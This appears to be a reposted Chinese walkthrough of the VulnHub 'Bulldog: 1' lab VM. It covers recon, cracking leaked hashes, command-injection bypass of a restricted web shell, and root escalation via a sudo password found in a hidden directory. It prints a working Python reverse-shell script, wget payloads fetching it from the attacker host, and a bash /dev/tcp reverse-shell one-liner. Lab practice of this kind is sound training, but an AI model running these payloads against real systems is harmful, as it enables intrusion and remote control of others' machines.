VulnHub渗透测试实战靶场 - Bulldog: 1

Posted H3rmesk1t

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了VulnHub渗透测试实战靶场 - Bulldog: 1相关的知识,希望对你有一定的参考价值。

环境下载

戳此进行环境下载

Bulldog: 1靶机搭建

具体步骤参考VirtualBox(Host only)和VMware共用同一虚拟网卡

  • 将下载好的靶机环境,导入VritualBox,设置为Host-Only模式
  • 将VMware中桥接模式网卡设置为VritualBox的Host-only

获取到IP地址为:192.168.56.101

渗透测试

信息搜集

用Kali自带的Nmap扫描目标IP:sudo nmap -sS -A 192.168.56.101,发现开放了23、80、8080端口

dirsearch对web目录进行扫描:python3 dirsearch.py -u 192.168.56.101 -e *.php

漏洞挖掘

访问80端口

whatweb进行web站扫描:whatweb http://192.168.56.101/,发现是Django建站

http://192.168.56.101/ [200 OK] Bootstrap, Country[RESERVED][ZZ], maybe Django, html5, HTTPServer[WSGIServer/0.1 Python/2.7.12], IP[192.168.56.101], JQuery, Python[2.7.12], Script, Title[Bulldog Industries], X-Frame-Options[SAMEORIGIN]

依次访问扫描到的web目录



测试后发现,robots.txt页面没有什么有用的信息,/admin无法注入成功,在/dev发现一些可疑的hash值,解密后发现

6515229daf8dbdc8b89fed2e60f107433da5f2cb
破解失败
38882f3b81f8f2bc47d9f3119155b05f954892fb
破解失败
c6f7e34d5d08ba4a40dd5627508ccb55b425e279
破解失败
0e6ae9fe8af1cd4192865ac97ebf6bda414218a9
破解失败
553d917a396414ab99785694afd51df3a8a8a3e0
破解失败
ddf45997a7e18a25ad5f5cf222da64814dd060d5
bulldog
d8b8dd5e7f000b8dea26ef8428caf38c04466b3e
bulldoglover

尝试用得到的两组数据进行登录,发现可以用sarah:bulldoglover进行登录,登陆进去后使用web-shell

给了6个可用的命令,执行其他的命令会被拦截,这里用&或者|进行命令组合绕过,也可以用echo来绕过


getshell

发现可以成功绕过限制后,在Kali上用python起一个HTTP服务器:python2 -m SimpleHTTPServer 80,将把shell文件放到网站目录下,通过靶机下载用python写的shell反弹脚本

import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.56.102",1234))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/bash","-i"])

Payload:pwd&&wget http://192.168.56.102/shell.py,成功下载到shell文件

起一个监听:nc -nvvlp 1234,执行Payload:pwd&&python shell.py,成功反弹shell

补充一下用echo绕过的话反弹shell的姿势:echo ‘bash -i >& /dev/tcp/192.168.56.102/12340>&1’|bash

提权

首先用whoamiuname -acat /etc/issue查看一下有没有可以利用的信息

翻阅目录查找信息,在/home/bulldogadmin/.hiddenadmindirectory/customPermissionApp中找到sudo的密码:SUPERultimatePASSWORDyouCANTget

提升权限至root:sudo python -c 'import pty;pty.spawn("/bin/bash")'

以上是关于VulnHub渗透测试实战靶场 - Bulldog: 1的主要内容,如果未能解决你的问题,请参考以下文章

VulnHub渗透测试实战靶场 - Funbox: Lunchbreaker

VulnHub渗透测试实战靶场 - NULLY CYBERSECURITY: 1

VulnHub渗透测试实战靶场-HA: FORENSICS

VulnHub渗透测试实战靶场 - FUNBOX: CTF

VulnHub渗透测试实战靶场 - Funbox: GaoKao

VulnHub渗透测试实战靶场 - DevContainer:1